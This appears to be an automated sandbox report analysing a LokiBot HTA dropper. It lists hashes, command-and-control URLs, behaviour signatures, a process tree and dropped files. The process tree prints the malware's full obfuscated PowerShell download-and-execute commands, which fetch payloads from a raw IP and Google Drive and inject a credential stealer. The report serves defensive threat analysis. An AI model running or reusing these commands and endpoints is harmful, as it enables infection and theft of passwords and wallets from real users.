Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 08:35

General

  • Target

    seethebestthingstobegoodwithhislifebestthigns.hta

  • Size

    130KB

  • MD5

    0b1aa8ae190d05df71f4052fae67df5b

  • SHA1

    f6fe29f3e7830b15e3b244ba83216c029dcb60fb

  • SHA256

    4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d

  • SHA512

    94008a8bf00a1334c16129258243bf89d8351c82ede845fefdb657838fe2f602f761b9935e5fef5e01b368096993f49a48e65d3705cea948d9435db0df370a04

  • SSDEEP

    96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingstobegoodwithhislifebestthigns.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\SysWOW64\WinDOWspOwershElL\v1.0\pOweRshEll.eXe
      "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1448
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\spea4bd4\spea4bd4.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89C1.tmp" "c:\Users\Admin\AppData\Local\Temp\spea4bd4\CSC52E56A52DBD54868911AA56B3DEB88CE.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4192
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2172
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              6⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1708

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRshEll.eXe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    f9f78fdc9064ff8bad9bc97ca5c3f0b0

    SHA1

    f704f5b5c0759fad83cd060671b3dad6bc47a10c

    SHA256

    b324ad0bddc8ff51cba721ee76b254e53b1725aef83a15f8b0a4d0e291ada0c2

    SHA512

    0026bf212d98236fe99086fc3611d18fa098309540f540a53d32fe97b546a51afd5449bb7f91ad8a625cb78a7b95184744fd516c955bbafd14f07f727d02bdb3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    00737d1431e55f0449322523a92df1d2

    SHA1

    612c3a2ea2a6117aa962d0c4c30126af940b5e61

    SHA256

    a10670ff9cef9a92b95a56f5cb6cf7a35617c964adecc5c6c3d2ddece851b56a

    SHA512

    c4a793cc1375cae7d40ea40540da866e0e546161f044c0ea5b0af9708fc40b14db4eef4a7ba1e605fecf1cdb6f750fdb013a96184ee9fd8664f0c04249da2c32

  • C:\Users\Admin\AppData\Local\Temp\RES89C1.tmp

    Filesize

    1KB

    MD5

    aa47d5a50a98ad3da8d12be404857c6e

    SHA1

    a9853a82c496b70a14ea9180fae0bac79564d7d6

    SHA256

    d2f71308dd23c4b57b9ee36fa8b4a708b2269a56556ae88471a44fdc4ad39153

    SHA512

    21e03acee1b6dcf4ca072d1e50762d1f372edb314b4c661dbbc79ba9f71da36e49d4750f9c7ec9dab3b5a7f7e966dee1fb83a4833c43d7f11610c3c50ea5c949

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1rwe41c.phw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\spea4bd4\spea4bd4.dll

    Filesize

    3KB

    MD5

    bca6f8ee4bde56d7c60726f968710462

    SHA1

    25706c16e5946dbba45a551b382e7211a27620c9

    SHA256

    8d60c119fee3f581cbd8e8bc3ea304c28a2ea879e22e725fbff54d9f63facc40

    SHA512

    cd282f563b52c78a5fd2539f43eb5ce299ce05d9808bab5143aac211704829f55b756a8d2bdaf4be0898c622d8769f0ae139d75f3b58b22d3f822056fb785393

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3756129449-3121373848-4276368241-1000\0f5007522459c86e95ffcc62f32308f1_a63d6fdc-08cb-4232-ab51-76cafdcb4d96

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3756129449-3121373848-4276368241-1000\0f5007522459c86e95ffcc62f32308f1_a63d6fdc-08cb-4232-ab51-76cafdcb4d96

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

    Filesize

    136KB

    MD5

    52a69ab69d1c871566791a3c06982607

    SHA1

    367845c8b76d602680ee6069f3bde95e02c350d9

    SHA256

    4f6090a3d6a848ae3ef2310caca02976fe8448fc21cbe357f4a28a88f34ead28

    SHA512

    681b60151ef27726f8b4c9c0949a8962fa8b16fe3583ba5ee4019831b6ac2ad5bf2562da0e8fc55cdec4cb10c59a608896b9be98bedd1a8bbde43b711ee2e0c2

  • \??\c:\Users\Admin\AppData\Local\Temp\spea4bd4\CSC52E56A52DBD54868911AA56B3DEB88CE.TMP

    Filesize

    652B

    MD5

    b61ba3f5a55f59976f1a05cd55501717

    SHA1

    90352d8fe9a24108f1dffed3ed4166e721f1380c

    SHA256

    ce83f5de1abecc53a3859b96a37c023d4f4e40b815430e2cbc7f89a516011ad8

    SHA512

    c80c2a217228846aec6d21de257cadd41aae8f870ae52c17648660dbee9a17e0c19e18ad803ff584cb94824d611ad644d8fac5b7f13cc36e367c71061695151f

  • \??\c:\Users\Admin\AppData\Local\Temp\spea4bd4\spea4bd4.0.cs

    Filesize

    469B

    MD5

    de4a3e7070e220b427d460a803bf2b1b

    SHA1

    f59c55466008ca3d557cc114c01395ba724a3a32

    SHA256

    0652da0455490eaf890ddcbc122a763d5f4031a9b2825d514d105bd8ea142eae

    SHA512

    afed9ff23e8f788d80f409856741bc68e985eb0092412f91e709d917fc37ea47e43b2560313195e5c0f8facc6232ddd74e5ca38c66d16af31d5f7b4984999b85

  • \??\c:\Users\Admin\AppData\Local\Temp\spea4bd4\spea4bd4.cmdline

    Filesize

    369B

    MD5

    58f4f9630f319aba65129a723be7a8d1

    SHA1

    b3a07795aeeb83a95fff84bc7f7350347a90eef8

    SHA256

    6a8f56fc254f129cfa88b78fd4950f8bcc9d85245ac9d2e25d15f211711569b7

    SHA512

    7897e3b1dbb8e8b56d826ff61396d074515e7da91bc9cf43b5e356b07934a242e9771a88dd05e143bed6b76f84bb37c048d6de9c0fec4f01bee7fe54e29287ab

  • memory/1448-28-0x0000000006730000-0x0000000006762000-memory.dmp

    Filesize

    200KB

  • memory/1448-39-0x0000000006770000-0x000000000678E000-memory.dmp

    Filesize

    120KB

  • memory/1448-40-0x0000000007360000-0x0000000007403000-memory.dmp

    Filesize

    652KB

  • memory/1448-41-0x0000000007AD0000-0x000000000814A000-memory.dmp

    Filesize

    6.5MB

  • memory/1448-42-0x0000000007490000-0x00000000074AA000-memory.dmp

    Filesize

    104KB

  • memory/1448-43-0x00000000074F0000-0x00000000074FA000-memory.dmp

    Filesize

    40KB

  • memory/1448-44-0x0000000007720000-0x00000000077B6000-memory.dmp

    Filesize

    600KB

  • memory/1448-45-0x0000000007690000-0x00000000076A1000-memory.dmp

    Filesize

    68KB

  • memory/1448-46-0x00000000076C0000-0x00000000076CE000-memory.dmp

    Filesize

    56KB

  • memory/1448-47-0x00000000076D0000-0x00000000076E4000-memory.dmp

    Filesize

    80KB

  • memory/1448-48-0x00000000077E0000-0x00000000077FA000-memory.dmp

    Filesize

    104KB

  • memory/1448-49-0x0000000007710000-0x0000000007718000-memory.dmp

    Filesize

    32KB

  • memory/1448-29-0x000000006E0C0000-0x000000006E10C000-memory.dmp

    Filesize

    304KB

  • memory/1612-64-0x0000000006CB0000-0x0000000006CB8000-memory.dmp

    Filesize

    32KB

  • memory/1612-4-0x0000000005830000-0x0000000005852000-memory.dmp

    Filesize

    136KB

  • memory/1612-17-0x00000000066F0000-0x000000000670E000-memory.dmp

    Filesize

    120KB

  • memory/1612-16-0x0000000006350000-0x00000000066A4000-memory.dmp

    Filesize

    3.3MB

  • memory/1612-0-0x000000007180E000-0x000000007180F000-memory.dmp

    Filesize

    4KB

  • memory/1612-70-0x0000000007AC0000-0x0000000007AE2000-memory.dmp

    Filesize

    136KB

  • memory/1612-71-0x0000000008960000-0x0000000008F04000-memory.dmp

    Filesize

    5.6MB

  • memory/1612-6-0x00000000060B0000-0x0000000006116000-memory.dmp

    Filesize

    408KB

  • memory/1612-5-0x0000000006040000-0x00000000060A6000-memory.dmp

    Filesize

    408KB

  • memory/1612-18-0x0000000006720000-0x000000000676C000-memory.dmp

    Filesize

    304KB

  • memory/1612-78-0x0000000071800000-0x0000000071FB0000-memory.dmp

    Filesize

    7.7MB

  • memory/1612-1-0x0000000005120000-0x0000000005156000-memory.dmp

    Filesize

    216KB

  • memory/1612-2-0x0000000071800000-0x0000000071FB0000-memory.dmp

    Filesize

    7.7MB

  • memory/1612-3-0x0000000005910000-0x0000000005F38000-memory.dmp

    Filesize

    6.2MB

  • memory/1708-101-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1708-100-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1708-125-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1708-133-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/4528-99-0x0000000007850000-0x00000000078EC000-memory.dmp

    Filesize

    624KB

  • memory/4528-98-0x00000000076F0000-0x000000000784A000-memory.dmp

    Filesize

    1.4MB